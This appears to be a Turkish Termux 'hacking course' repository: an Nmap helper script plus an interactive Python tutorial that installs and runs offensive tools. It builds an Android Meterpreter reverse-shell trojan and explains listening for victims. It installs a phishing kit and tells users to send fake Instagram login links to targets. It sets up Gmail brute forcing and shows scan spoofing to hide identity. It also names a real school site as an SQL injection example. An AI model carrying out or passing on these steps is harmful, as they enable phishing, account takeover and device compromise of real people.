formSubmit: function (e) {
var that = this;
var formData = e.detail.value;
if (e.detail.value.addr_pages == null || e.detail.value.detail_pages == null || e.detail.value.grade_pages == null || e.detail.value.time_pages == null) {
wx.showToast({
title: '信息未填完整!',
icon: 'error',
duration: 1500
})
setTimeout(function () {
wx.hideToast()
}, 2000)
}
else{
wx.showLoading({
title: '网络请求中...',
duration:3000,
})
wx.request({
url: 'https://www.bbin.design/api/addpages.php',
data:formData,
header: {
"Content-Type": "application/x-www-form-urlencoded"
},
method: "POST",
data: {
id_pages: e.detail.value.id_pages,
now_pages: e.detail.value.now_pages,
name_pages:e.detail.value.name_pages,
no_pages:e.detail.value.no_pages,
phone_pages:e.detail.value.phone_pages,
addr_pages:e.detail.value.addr_pages,
detail_pages:e.detail.value.detail_pages,
grade_pages:e.detail.value.grade_pages,
time_pages:e.detail.value.time_pages,
},
success: function (res) {
if (res.data.status == 0) {
wx.showToast({
title: '提交失败!!',
icon: 'loading',
duration: 10000
})
} else {
wx.showToast({
title: '报修成功!',
icon: 'success',
duration:1000,
success: function () {
setTimeout(function () {
wx.reLaunch({
url: '/pages/detail_repairer/detail_repairer',
})
}, 1500);
var page = getCurrentPages().pop();
if (page == undefined || page == null) return;
page.onLoad();
},
})
}
}
})
}
}
})<file_sep>Page({
/**
* 页面的初始数据
*/
data: {
},
/**
* 生命周期函数--监听页面加载
*/
onLoad: function (options) {
var that = this
var no_repairer = wx.getStorageSync('no')
this.setData({
no_repairer:no_repairer
})
wx.request({
url: 'https://www.bbin.design/api/myinfo.php',
method:"get",
header: {
'content-type': 'application/json'
},
data:{
no_repairer:no_repairer,
},
success:function(res){
//console.log(res.data)
that.setData({
list:res.data
})
},
})
},
formSubmit: function (e) {
//首先是用var函数获取input的输入信息
var no_repairer = e.detail.value.no_repairer;
var pass_repairer = e.detail.value.pass_repairer;
var phone_repairer = e.detail.value.phone_repairer;
//判断一下这个人输入没,有一个没输入就用showToast提醒他下
if (pass_repairer == '' || phone_repairer == '' || phone_repairer == null || phone_repairer == null ) {
wx.showToast({
title: '信息未修改',
icon: 'error',
duration: 1000
})
}
//接下来开始修改密码showLoading是让客户们稍等片刻
else {
wx.showLoading({
title: '网络请求中...',
})
//wx.request是微信小程序发送到后台的一种方式
wx.request({
url: "https://www.bbin.design/api/changemyinfo.php",//写清楚你要调用哪一个后台文件
method: 'POST',//method有两种方式,发送一般用POST,接收一般用GET
data: {//data里面的数据你把它当成一个快递,包装所有文件然后发送出去
no_repairer:no_repairer,
pass_repairer:pass_repairer,
phone_repairer:phone_repairer,
},
header: {
'content-type': 'application/x-www-form-urlencoded'
},
success: (res) => {//当成功的时候使用success函数进行下一步
console.log(res);//console.log类似c语言的printf,c++的cout,python的print。主要是用来调试的,后期可以删掉。
if (res.data.error) {//res.data.error的意思是如果数据错误
wx.showToast({
icon: 'none',
duration: 2000,
})
} else {
wx.showToast({
title:"请重新登陆!",
icon: 'success',//这里用success可以在客户成功修改后弹出一个√
duration: 1000,//duration是等待,1000为1秒
success: function () {
setTimeout(function () {
wx.reLaunch({
url: '/pages/index/index',//成功修改密码后我们返回登录界面(登录界面地址自行修改)
})
}, 2000)
}
})
}
}
})
}
},
onReady: function () {
},
/**
* 生命周期函数--监听页面显示
*/
onShow: function () {
},
/**
* 生命周期函数--监听页面隐藏
*/
onHide: function () {
},
/**
* 生命周期函数--监听页面卸载
*/
onUnload: function () {
},
/**
* 页面相关事件处理函数--监听用户下拉动作
*/
onPullDownRefresh: function () {
},
/**
* 页面上拉触底事件的处理函数
*/
onReachBottom: function () {
},
/**
* 用户点击右上角分享
*/
onShareAppMessage: function () {
}
})<file_sep># campus_repair
Campus fault repair system based on wechat applet
test account:
1.repairer(account:201751701327;password:<PASSWORD>)
2.maintainer(account:001;password:<PASSWORD>)
3.administrator(account:root;password:<PASSWORD>)
<file_sep>const app = getApp()
Page({
data: {
currentTabIndex:0,
top:["新报修","待维修","已完成"]
},
toadd:function(){
wx.navigateTo({
url: '/pages/addpapes_repairer/addpages_repairer',
})
},
onTabsItemTap:function(event){
var that = this
var name_pages = wx.getStorageSync('name')
let index=event.currentTarget.dataset.index;
this.setData({
currentTabIndex:index
})
console.log(name_pages)
wx.request({
url: 'https://www.bbin.design/api/repairing_repairer.php',
data:{
name_repairer:name_pages
},
success:function(res){
console.log(res)
that.setData({
list2:res.data
})
}
})
wx.request({
url: 'https://www.bbin.design/api/repaired_repairer.php',
data:{
name_repairer:name_pages
},
success:function(res){
console.log(res)
that.setData({
list3:res.data
})
}
})
},
click:function(e){
var id_pages = e.currentTarget.dataset.id
var index = e.currentTarget.dataset.index
console.log(id_pages)
console.log(index)
wx.setStorageSync('id_pages', id_pages)
wx.navigateTo({
url: '/pages/detail_1_repairer/detail_1_repairer?index='+index,
})
},
onLoad: function () {
var that = this
var no_pages = wx.getStorageSync('no')
console.log(no_pages)
wx.request({
url: 'https://www.bbin.design/api/allrepairer.php',
headers: {
'content-type':'application/json'
},
data:{
no_pages:no_pages,
},
success: function (res) {
console.log(res.data)
//将获取到的json数据,存在名字叫list的这个数组中
that.setData({
list: res.data,
//res代表success函数的事件对,data是固定的,list是数组
})
}
})
},
onPullDownRefresh:function()
{
this.onLoad()
wx.showNavigationBarLoading() //在标题栏中显示加载
//模拟加载
setTimeout(function()
{
// complete
wx.hideNavigationBarLoading() //完成停止加载
wx.stopPullDownRefresh() //停止下拉刷新
},1500);
},
})
|
5ebacb7b298d7b4978cba153af6e8fb621aae863
|
[
"JavaScript",
"Markdown"
] | 7
|
JavaScript
|
CoffeeLin0101/campus_repair
|
099b00dd195e642674533a3b5a64f52900866522
|
aecb348f8492477f2ae845d195785ed15fe7f7ad
|
refs/heads/main
|
<file_sep>def add(num1, num2):
return num1 + num2
def substract(num1, num2):
return num1 - num2
<file_sep># hello-world
First public commit
<file_sep>import matplotlib
import hello_world as hw
import calculator as calc
def main():
hw.helloWorld()
print(calc.add(10, 20))
print(calc.substract(10, 20))
main()
|
9e5c7cdb7520ea8890e6496448f5c34d87da43ca
|
[
"Markdown",
"Python"
] | 3
|
Python
|
martintargaryen/hello-world
|
b1f28725016429c4b6ad5313113eb2e1480799ee
|
87a35c98b120b6d3d5b334a5a701206c51c2b5d3
|
refs/heads/main
|
<repo_name>asetrsaepdeneme/saep<file_sep>/TEğitim Döküman/6.DERS/Nmap_Pratik_Kullanım.py
#!usr/bin/env python
# -*- coding: utf-8 -*-
import os
os.system("apt install tcptraceroute")
os.system("apt install traceroute")
os.system("apt install figlet")
os.system("apt-get install nmap")
os.system("clear")
os.system("figlet MAKRO")
print("""Nmap pratik programına hoş geldiniz
1)Kısa Tarama
2)Port tarama
3)Agresif tarama
4)Gizli Tarama(mac adres)
5)Gizli Tarama(İP adres)
6)Hedef İşletim sistemini Öğrenme
7)Hedef Servis Sürümleni Öğrenme
8)Hedef Filitreleme Tespiti
9)Firewall Atlatma
""")
secim = raw_input("Lütfen Seçim Yapınız: ")
if(secim=="1"):
hedef = raw_input("Lütfen Hedef IP Giriniz: ")
os.system("nmap "+ hedef)
print("""
Terminalde Kullanımı İçin: nmap + hedef""")
elif(secim=="2"):
hedef = raw_input("Lütfen Hedef IP Giriniz: ")
os.system("nmap -sS -sV "+hedef )
print("""
Terminalde Kullanımı İçin: nmap -sS -sV + hedef""")
elif(secim=="3"):
hedef = raw_input("Lütfen Hedef IP Giriniz: ")
os.system("nmap -A "+hedef )
print("""
Terminalde Kullanımı İçin: nmap -A hedef""")
elif(secim=="4"):
hedef = raw_input("Lütfen Hedef IP Giriniz: ")
os.system("nmap 10.0.2.15 --spoof-mac 00:0B:DB:82:58:C3 "+ hedef)
print("""
Terminalde Kullanımı İçin: nmap --spoof-mac + MAC + hedef""")
elif(secim=="5"):
hedef = raw_input("Lütfen Hedef IP Giriniz: ")
os.system("nmap -D 172.16.58.3 " + hedef)
print("""
Terminalde Kullanımı İçin: nmap -D + sahte IP + hedef""")
elif(secim=="6"):
hedef = raw_input("Lütfen Hedef IP Giriniz: ")
os.system("nmap -sS "+ hedef)
print("""
Terminalde Kullanımı İçin: nmap -sS + hedef""")
elif(secim=="7"):
hedef = raw_input("Lütfen Hedef IP Giriniz: ")
os.system("nmap -sV "+ hedef)
print("""
Terminalde Kullanımı İçin: nmap -sV + hedef""")
elif(secim=="8"):
hedef = raw_input("Lütfen Hedef IP Giriniz: ")
os.system("nmap -sA "+ hedef)
print("""
Terminalde Kullanımı İçin: nmap -sA + hedef""")
elif(secim=="9"):
hedef = raw_input("Lütfen Hedef IP Giriniz: ")
os.system("nmap -f -f "+ hedef)
print("""
Terminalde Kullanımı İçin: nmap -f -f + hedef (-f parametresi firewallı daha kolay atlatmayı sağlar ama tarama süresini uzatır)""")
else:
print("Hatlı Seçim Yeniden Dene")
tek = raw_input("Tekrar Tarama Yapmak İstermisin y/n: ")
if(tek=="y"):
os.system("python Nmap_Pratik_Kullanım.py")
elif(tek=="n"):
print("Tekrar Görüşmek Üzere")
else:
print("Yanlış Seçim Program Kapatılıyor")
<file_sep>/TEğitim.py
#!usr/bin/env python3
#-*- coding:utf-8 -*-
import os
os.system("clear")
print("""
\033[94m
\033[1m
_____ _____ _ _ _
|_ _|__ _ __ _ __ ___ _ ___ __ | ____|__ _(_) |_(_)_ __ ___
| |/ _ \ '__| '_ ` _ \| | | \ \/ / | _| / _` | | __| | '_ ` _ \
| | __/ | | | | | | | |_| |> < | |__| (_| | | |_| | | | | | |
|_|\___|_| |_| |_| |_|\__,_/_/\_\ |_____\__, |_|\__|_|_| |_| |_|
|___/
\033[1m
\033[92m
Eğitime Hoşgeldiniz
1)Termux Nedir 2)Admin Panelleri Nasıl Bulunur
3)Tooları Nasıl indireceğiz 4)Trojan Nasıl Oluşturulur
5)Trojan Nasıl Dinlemeye Alınır 6)Nmap Nedir Nasıl Kullanılır
7)Gmail Hesaplarını Hackleme 8)İnstagram Hackleme Ve Mantıkları
9)Siteler Hakkında Bilgi Edinme 10)Sitelerde Açık Arama
11)Kamera Hackleme 12)Gizli Hesapları İnceleme
13)Yazılımcı Olmak İsteyenler 14)İnternet Hakkında
15)Kulanıcı Adından Hesap Bulma 16)DDos Nedir?
17)Nasıl DDoS Atılır 18)Ekstra Bilgi Ve Döküman
19)Parola Listesi Oluşturma 20)Kişiye Özel Parola Listesi Oluşturma
21)Bilgilendirme Ve Teşekkür
q)Çıkış
""")
ilk = input("Öğrenmek İstediğinizi Seçin: ")
if ilk=="1":
os.system("clear")
print("""\033[1m
\033[92m
Termux Android Telefonlardan Kendini hack Konusunda
Geliştirmek İsteyenler İçin Tasarlanmış Bir Debian
Tabanlı Telefon Uygulaması (IOS Desteklemez)
Termux İçinde Paket Yükleyicisi Sayesinde Birçok Şeyi
Kendi İçinde Kurabilir Bu Depolar "pkg ,apt ,apt-get" Şeklindedir
Bir Paket Yüklemek İsterseniz "pkg install paket-adı"
Şeklinde Yüklersiniz. Sizin Linux'da Yapacağınız İşlerin
5/4'ünü Yapabilir Bu Yüzden Bilgisayarı Olmayan
Hacker Olamaz Diye Birşey Yoktur. Akıllı Telefonu Olan
Herkes Hacker Olabilir.
""")
don = input("Ana Menüye Dönmek İstermisiniz[E/h]: ")
if don=="e" or don=="E":
os.system("python3 TEğitim.py")
elif don=="h" or don=="H":
exit()
elif ilk=="2":
os.system("clear")
print("""\033[1m
\033[92m
Öncelikle Admin Panel Nedir?
Admin Adından Anlaşılacağı Gibi
Admin Yetkisi Olanların Giriş Yapabileceği
Giriş Sistemidir. Giriş Sisteminde Bulunabilecek Açıklar
Genel Olarak SQL Ve Brute Force Olarak Karşımıza Çıkarlar.
İsterseniz Nasıl Admin Panel Bulunur Görelim
""")
dev = input("Devam Edilsin mi? [E/h] ")
if dev=="e" or dev=="E":
print("Önce Kullanıcağımız aracı indirelim")
os.system("sleep 3")
os.system("pkg install git")
os.chdir("/data/data/com.termux/files/home")
os.system("git clone https://github.com/saepsh/saepapf")
print("Şuan Gerekli Dosya İndirildi ")
os.system("sleep 3")
print("Kullanılan Komutları Eğitim İçinde Bulabilirsiniz.\nLütfen Onlarıda İnceleyin")
os.chdir("/data/data/com.termux/files/home/saepapf")
os.system("chmod 777 *")
os.system("python2 saepapf.py")
elif dev=="h" or dev=="H":
exit()
elif ilk=="3":
os.system("clear")
print("Toolar Zaten Otomatik Olarak Bu Eğitimde Kuruluyor Ama Ben Size <NAME> Yükleyeceğinizi Burada Detaylı Bir Şekilde Anlatacağım")
print("""\033[1m
\033[92m
Şimdi toolları en çok github.com adresinden indireceğiz buradan tooları indirmek için
önce git aracını kuruyoruz bunun için "pkg install git" yazabilirsiniz
git aracını kullanabilmek için "git clone <toolun linki>"
yani "git clone https://github.com/M49R0/MACRO.git" Şeklinde yazıcaksınız.
Sonra indirilen dosyanın içine girmek için "cd" komutunu kullanıyoruz
örneğin "cd MACRO" bu komutla eğer dosya orada ise dosyanın içine girecektir.
eğer dosyadan çıkmak ve ana dizine gizmek istiyorsanız sadece "cd" yazın.
Yok ben bir dizin aşağı gidicem diyorsanız o zaman "cd .." yazın.
Bir dosyanın içinde ne var görmek istiyorsanız "ls" yazın.
Bir Python dosyasını açmak için pythonun yüklü olması lazım
mesela "python örnek.py" ama bazen bazı python dosyaları
farklı oluyor. Mesela python3 python2 ilede açılan dosyalar var.
Shell ile yazılmış bir dosyayı ise "bash örnek.sh" şeklinde açabilirsiniz
""")
don = input("Ana Menüye Dönmek İstermisiniz[E/h]: ")
if don=="e" or don=="E":
os.system("python3 TEğitim.py")
elif don=="h" or don=="H":
exit()
elif ilk=="4":
os.system("clear")
print("""\033[1m\033[92m
Trojan Nedir?
Truva atı olarakda bilinen bu virüs çok zararlıdır.
En başta kötü bir niyetle yapılmamıştı.
Ama sonradan kötüye kullanılmaya Başladı
saldırganın herşeyi ele geçirebilme olasıığı %95'dir
Trojanı Nasıl oluştururum
Bunun için metasploit denen bir araca ihtiyacımız var
metasploit iki bölümden oluşuyor msfvenom ve msfconsole
msfvenom ile trojan hazırlanıyor
msfconsole ile trojanımızı dinleyip yönetiyoruz
Tafsilat:
Trojanlardan korunmak için bilmediğiniz uygulamaları
hemen indirip açmayın. İndirirseniz bile virüs taraması yapmadan açmayın
Şimdi <NAME> Gelelim
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="e" or dev=="E":
os.system("clear")
print("""\033[1m\033[92m
Şimdi Metasploit manual olarak kurulması gereken bir araç
Biz onu şimdi otomatik olarak kuracağız ama siz manual olarak kurulmasını
dökümanlar arasnda bulabilirsiniz.
""")
os.system("sleep 5")
os.chdir("/data/data/com.termux/files/home")
os.system("pkg install wget")
os.system("pkg install curl")
os.system("wget https://raw.githubusercontent.com/gushmazuko/metasploit_in_termux/master/metasploit.sh")
os.system("chmod 777 *")
os.system("./metasploit.sh")
os.chdir("/data/data/com.termux/files/home/metasploit-framework")
os.system("chmod 777 *")
print("""\033[1m\033[92m
Msfvenomu kullanmak için payloadları bilmeniz gerekir
payloadları öğrenmek için "./msfvenom --list-payload" yazın
bütün payloadları gösterecektir.
Ama ben sadece windows için olan payloadları görmek istiyorum döyorsanız
bu payloadları msfconsole'dan "search windows" yazarak windows için olan
payloanları görebilirsiniz mesela şimdi android için bir virüs hazırlayalım
""")
don = input("Devam Edilsin mi[E/h] ")
if don=="e" or don=="E":
os.system("clear")
ip = input("Local IP Adresinizi Girin (ifconfig yazınca çıkması lazım): ")
os.system("msfvenom -p android/meterpreter/reverse_tcp LHOST=" + ip + "LPORT=4163 -O trojan.apk")
print("""\033[1m\033[92m
Trojanımız 4163 portunu kullanıyor sadece kendi ağınızda kullanabilirsiniz.
sizin modeminize bağlı olmayan bir kişi bu bu trojanı açsa bile siz onu hackleyemezsiniz
ilerde nasıl trojanı dinleyeceğimizi gösteriyorum şimdilik bu kadar.
""")
don = input("Ana Menüye Dönmek İstermisiniz[E/h]: ")
if don=="e" or don=="E":
os.system("python3 TEğitim.py")
elif don=="h" or don=="H":
exit()
elif don=="h" or don=="H":
exit()
elif ilk=="5":
print("""\033[1m\033[92m
Bir Trojanı dinlemeye almak için önce msfconsole yazıp enter tuşuna
basıyoruz açıldıktan sonra "use exploit/multi/handler" yazıyoruz
bundan sonrada "set payload" yazıp payloadımızın adını yazıyoruz
önceki derste payloadımız "android/meterpreter/reverse_tcp" şeklindeydi
payloadımızı eklemek için "set" yazıyoruz set seçmek anlamına gelir
"set payload" yazarak payload seçeceğimizi belirtiyoruz.
Yani yazmamız gereken "set payload android/meterpreter/reverse_tcp" yazmak.
sonra "show options" yazıyoruz. Bunu yazarak payload için ayar yapacağız
sonrada "set LHOST <Kendi IP Adresiniz>" yani "set LHOST 192.168.1.32" gibi
sonrada "set LPORT 4163" yazın
Tafsilat: LHOST Nedir?
LHOST virüsü açan bir kişiden bağlantı geldiğinde bağlantıyı
hangi IP adresine göndereceğini belirtmek için kullanılır
LPORT Nedir?
LPORT Bağlantıyı hangi portlar üzerinden saldırgana göndereceğini
belirtmek için kullanılır
""")
don = input("Ana Menüye Dönmek İstermisiniz[E/h]: ")
if don=="e" or don=="E":
os.system("python3 TEğitim.py")
elif don=="h" or don=="H":
exit()
elif ilk=="6":
os.system("clear")
print("""\033[1m\033[92m
Nmap Nedir?
Nmap çok gelişmiş bir bilgi toplama aracıdır.
çok ayrıntılı bir araçtır kullanılması biraz zordur
Nmap Nasıl Kullanılır?
Benim github hesabıma bakarsanız nmap pratik kullanım aracı var
nasıl kullanıldığınıda gösteriyorum isterseniz kullanımına geçelim
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="E" or dev=="e":
print("\nönce nmap aracını yükleyelim")
os.system("sleep 3")
os.system("pkg install nmap")
print("\033[1m\033[92m\nnmap'i yüklemek için 'pkg install nmap' yazabilirsiniz şuan nmap yüklendi")
os.system("sleep 4")
print("\n\n'nmap google.com' şeklinde bir arama yazarsanız klasik bilgileri verir")
dev = input("\n\nDevam Edilsin mi [E/h] ")
if dev=="E" or dev=="e":
print("\033[1m\033[92m\n\n-sV parametresini kullanırsanız yani 'nmap -sV google.com' şeklinde yaparsanız portları\nve servis sürüm bilgilerini verir. Servis sürüm bilgileri çok önemlidir ileride anlıyacaksınız")
deva = input("Devam Edilsin mi [E/h] ")
if deva=="E" or deva=="e":
os.system("sleep 1")
print("\033[1m\033[92mnmap hedefe sorgu paket göndererek bilgi toplar ama bu paketlerde sizin IP adresiniz gözükür IP adresinizi gizlemek için\n-D yazarak sahte bir IP adresi yazarsanız IP adresinizi gizlersiniz.\nYani --> nmap google.com -D 192.168.127.12")
dev = input("\n\nDevam Edilsin mi [E/h] ")
if deva=="E" or deva=="e":
os.system("clear")
print("\033[1m\033[92mSorgu paketleri atarken mac adreslerimizde gözükür\n\nMAC ADRES NERDİR?\n\nMac adres donanımların fiziksel adresleridir yani neredeyse tam konumunuzdur\n\nMac adresimizi nasıl gizleriz \n\nnmap --spoof-mac 00:0B:DB:82:58:C3 Şeklinde bir sorgu yaparsanız mav adresiniz gözükmez.\nYani sahte mac adresi gözükür sahte mac adresi ile sizi bulamazlar")
print("\033[1m\033[92mDaha Fazla Ayrıntı için Nmap Pratik Kullanım Aracımı İnceleyebilirsiniz Bu Eğitim dökümanları arasında bulabilirsiniz")
an = input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if an=="e" or an=="E":
os.system("python3 TEğitim.py")
elif deva=="h" or deva=="H":
os.system("sleep 0")
quit()
elif deva=="h" or deva=="H":
os.system("sleep 0")
quit()
elif dev=="h" or dev=="H":
quit()
elif ilk=="7":
os.system("clear")
print("""\033[1m\033[92mÖncelikle Gmail Hesabına ne yaparsak hesabı ele geçiririz?
Hesaba Oltalama Saldırısı Yapılabilir
Brute Force Attack (Kaba Kuvvet Saldırısı) Yapılabilir
Oltalama Nedir?
Sosyal mühendislik olarakda geçen bu saldırı
kişiye bir link gönderilerek kişiyi kandırma odaklı bir saldırıdır
Brute Force Attack Nedir?
Bir Parola Listesi Oluşturarak hedef Giriş Sistemine Parola Deneme Saldırısı
Yapma Saldırısıdır Nasıl Parola Listesi Oluşturabileceğinizi Bu Kursda Görebilirsiniz
Not: Bu Dersi İşlemeden Önce Bir Parola Listesi Oluşturun
""")
dev = input("<NAME> mi [E/h] ")
if dev=="e" or dev=="E":
os.system("clear")
print("Şimdi Gerekli Şeyler dosyalar Yükleniyor")
os.system("sleep 2")
os.system("pkg install git")
os.system("apt update")
os.system("pkg install python")
os.system("termux-setup-storage")
print("Kullanıcağımız Araç Hunner")
os.system("sleep 1")
os.chdir("/sdcard")
os.system("git clone https://github.com/b3-v3r/Hunner")
print("Programı Telefonun Kendisine Yükledik termuxu tekrar\naçtığınızda cd /sdcard yazarak ulaşabilirsiniz")
os.system("sleep 3")
print("""\033[1m\033[92m
Gmail ve Hotmail Brute Force Videosu Var
Burada Eğer Yazı İle Anlatsam 1 Sayfalık Yazı Çıkar
Gökümanlar arasında Videoyu Bulabilirsiniz
Not: Bu Dersi İzlemeden Önce Bir Parola Listesi Oluşturun
""")
elif ilk=="8":
os.system("clear")
print("""\033[1m\033[92m
İnstagram Hesapları Nasıl Hacklenir?
Not: Bu Anlatacaklarım Bir Sanalcıdan Alıntıdır
İnstagram Hesabı Çalmak Sizi Hacker Yapmaz Ve İllegal Bir Yoldur
Buradan Öğrendikleriniz Ve Uyguladıklarınızdan Ben Sorumlu Değilim
Not: Devam etmeden önce cihazınızdan Hostpot (mobil erisim noktası) ayarını aktifleştirin.
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="e" or dev=="E":
os.system("clear")
print("""\033[1m\033[92m
1.Hack Yolu
Sosyal Mühendislik
En Etkili Yollardan Birisidir.
Kişiyi kandırarak ona birşey yaptırırsınız ve kişi bunun farkına varmaz
farkına varsa bile çok geç olucaktır
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="e" or dev=="E":
print("""\033[1m\033[92m
Sosyal Mühendislik Saldırısı Nasıl Yapılır?
Bunun için gerekli araçlar var aracı indirip kurduktan sonra araç ile bir link oluşturulur.
Bu link açıldığında kişinin IP adresi gözükür sayfa instagram sayfası gibidir oraya giriş yaparsınız
ve bilgiler saldırganın eline geçer.
Evet bu bir sosyal mühendislik. Başka sosyal mühendislik saldırılarıda var onları dökümanlardan bulabilirsiniz
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="e" or dev=="E":
print("Dilerseniz gerekli aracı indirmeye başıyalım")
os.system("sleep 2")
os.chdir("/data/data/com.termux/files/home")
os.system("git clone https://github.com/htr-tech/nexphisher.git")
os.chdir("/data/data/com.termux/files/home/nexphisher")
os.system("chmod 777 *")
os.system("./tmux_setup")
print("Kurulum Tamamlandı...")
os.system("sleep 3")
print("""\033[1m\033[92m
Aracı çalıştırmak için önce ana dizine cd komutu ile gidin.
Ardından cd nexphisher komutu ile dizine geçiş yapın.
Sonra ./nexphisher komutu ile aracı çalıştırıp instagram yazanı seçin
Daha Sonra ngrok yazanı tuşlayın ve bekleyin
Önünüze "lkdsfjslklkdfjsd.io" gibi bir link çıkıcaktır saçma sapan gelebilir
o linki kurbana gönderin bilgileri girdiğinde sizede gelecektir
Ayrıntılı Bilgilye Dökümanlardan Ulaşabilirsiniz
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="e" or dev=="E":
print("""\033[1m\033[92m
2. Hack Yolu
Brute Force Attack Saldırısı Nasıl Yapılır?
Brute Force Attack Saldırısının Mantığı Nedir?
Bir parola listesi oluşturarak programlar yardımı ile bu doğru şifre bulunana kadar
denemesidir. Bu saldırıyı yapmak için bir araca ve bir parola listesi lazımdır
ama bu zamanlarda doğru şekilde saldırı yapan bir araç yok.
büyük bir kısmı kendini güncellemiyor bu yüzden saldırılar başarısız oluyor.
Ama nasıl bu saldırının yapılacağını dökümanlarda gösteriyorum
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="e" or dev=="E":
print("""\033[1m\033[92m
3. Hack Yolu
Methodlar
Bu aslıda bir hackleme değildir. Bunlar biraz sosyal mühendislik
ve biraz açıklardan yararlanma olarak nitelendirilebilir
Methodları Dökümanlar arasında bulabilirsiniz.
""")
elif dev=="h" or dev=="H":
quit()
elif dev=="h" or dev=="H":
quit()
elif ilk=="9":
os.system("clear")
print("""\033[1m\033[92m
Siteler hakkında bilgi toplama 2 çeşide ayrılır.
1.Aktif Bilgi Toplama
2.Pasif Bilgi Tolama
Aktif Bilgi Toplama Nedir?
Aktif bilgi toplama bir sunucudan veya bir siteden sizin hareketleriniz izlenerek gizli dosyalara erişmeye çalışmaktır
Pasif Bilgi Toplama Nedir?
Pasif bilgi toplama halka açık olan bilgilerden yararlanmaktır.
Hangisi Daha iyi
Aktif bilgi toplama ne kadar riskli olsada fazla bilgi verir
bu yüzden pasif bilgi toplama pek tercih edilmez
ama aktif bilgi toplamada IP adresiniz ve mac adresleriniz gözükür
konumunuz bilinir aktif bilgi toplarken VPN açmaya dikkat edin
ve yasalara uyun
Pasif Bilgi Toplama Araçları
Whois
Shodan
TheHarvester
Traceroute
vs
Aktif Bilgi Toplama Araçları
nmap
owasp-zap
maltego
nslookup
vs
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="E" or dev=="e":
print("""\033[1m\033[92m
1)Whois 2)TheHarvester
3)Traceroute 4)nmap
5)owasp-zap 6)maltego
""")
sec = input("Seçim Yapınız: ")
if sec=="1":
print("""\033[1m\033[92m
Whois Nasıl Kullanılır?
Öncelikle Whois Nasıl İndirilir
"apt install whois" yazarak kurabilirsiniz
whois aracını çalıştırmak için "whois sahibinden.com" şeklinde arama yapabilirsiniz.
Daha fazla ayrıntı için dökümanlara göz atabilirsiniz
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif sec=="2":
print("""\033[1m\033[92m
TheHarvester Nasıl Kullanılır?
Dökümanlarda Bununla ilgili Bir Link Var Orada Herşey Gösteriliyor
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif sec=="3":
print("""\033[1m\033[92m
TraceRoute Nedir?
Traceroute Bir paketin hangi IP adresleri üzerinden hedefe gittiğini görmek için kullanılan bir araçtır.
Bir sorgupaketi gönderildiğinde ne tür gecikme oluyor nereden hangi IP adresleri hedef ile bağlantılı olduğunu gösteriyor.
Hedefte bir güvenlik duvarı varsa * * * şeklinde boş kalır yani bir güvenlik yazılımı olduğu anlaşılır.
TraceRoute Nasıl İndirilir?
Termuxda "pkg install tracepath" yazarak kurabilirsiniz.
Kullanımı "traceroute google.com" şeklindedir
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif sec=="4":
print("""\033[1m\033[92m
Nmap Aracının Kullanımı 6. dersde gösteriliyor
nmap pratik kullanım aracınıda kullanabilirsiniz
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif sec=="5":
print("""\033[1m\033[92m
owasp-zap aracı termuxda çalışmıyor ama dökümanlarda owasp
aracının kullanımını görebilirsiniz
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif sec=="6":
print("""\033[1m\033[92m
maltego aracı termuxda çalışmıyor ama dökümanlarda maltego
aracının kullanımını gösteren linkler olacaktır
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif ilk=="10":
os.system("clear")
print("""\033[1m\033[92m
Web Sitelerinde Ne Tür Açıklar Bulunur
XSS, SQL ENJEKSİYON, İFRAME, GET PUT AND DELETE,
BRUTE FORCE, PHP ENJEKSİYON, HTML ENJEKSİYON VE
BACKDOORLAR
Aslında Daha Fazla Açık Var Ama Bunlar En Bilinenler.
İsterseniz Bazılarına Göz Atalım
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="E" or dev=="e":
print("""\033[1m\033[92m
Xss Nedir?
XSS (Cross Site Scripting) script kodları üzerinden
(genelde javascript) bir web sayfasına saldırı yapılmasıdır.
Bu Saldırının 3'e ayrılır
1 Reflected XSS
2 Stored XSS
3 DOM Tabanlı XSS
Yukarıda Zararsızdan Zararlıya Doğru Sıraladık.
Xss Hakkında Daha Fazla Bilgi İçin Dökümanlara Göz Atabilirsiniz.
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="E" or dev=="e":
os.system("clear")
print("""\033[1m\033[92m
SQL Enjeksiyonu Nedir?
Sql Enjeksiyonu veri tabanı açıklarından kaynaklı bir açık türüdür.
Veri tabanının Bazı Karakterleri Engellemediğinden Dolayı Bazı Hatalar Oluşur.
Bu hatalar sebebi ile bilgi sızdırılabilir
Sql Zaafiyetlerini Bulmak İçin Sqlmap Aracını Kullanabilirsiniz
(Saep Hack-Tool Aracında Kurulumu Otomatik Olarak Yapıyor)
Bu Zaafiyetlerin Nasıl İstismar Edileceği Hakkında Bilgi İçin Dökümanlara Göz Atabilirsiniz.
Not: Sql Zaafiyeti Bulmak İçin Azda Olsa Sql Dili Bilmeniz Gerekir
Örneğin: SELECT, INSERT, UPDATE, DELETE, ALTER, DROP, CREATE, USE, SHOW
Yukarudaki Kodlar Sql Dilinden Bazı Kodlardı Bunları Kullanmayı Bilirseniz Zaafiyetleri İstismar Edebilirsiniz
Sql Zaafiyeti Uygulamak İçin Linkin Örnekteki Gibi Olması Gerekir
Örnek: https://www.delhijainschool.com/gallery.php?id=15
Bu Eğitimde Web Zaafiyetleri Bu Kadardı Bir Sönraki Eğitimde Daha Ayrıntılı
Bir Şekilde Web Syber Security Derslerine Devam Edeceğiz.
""")
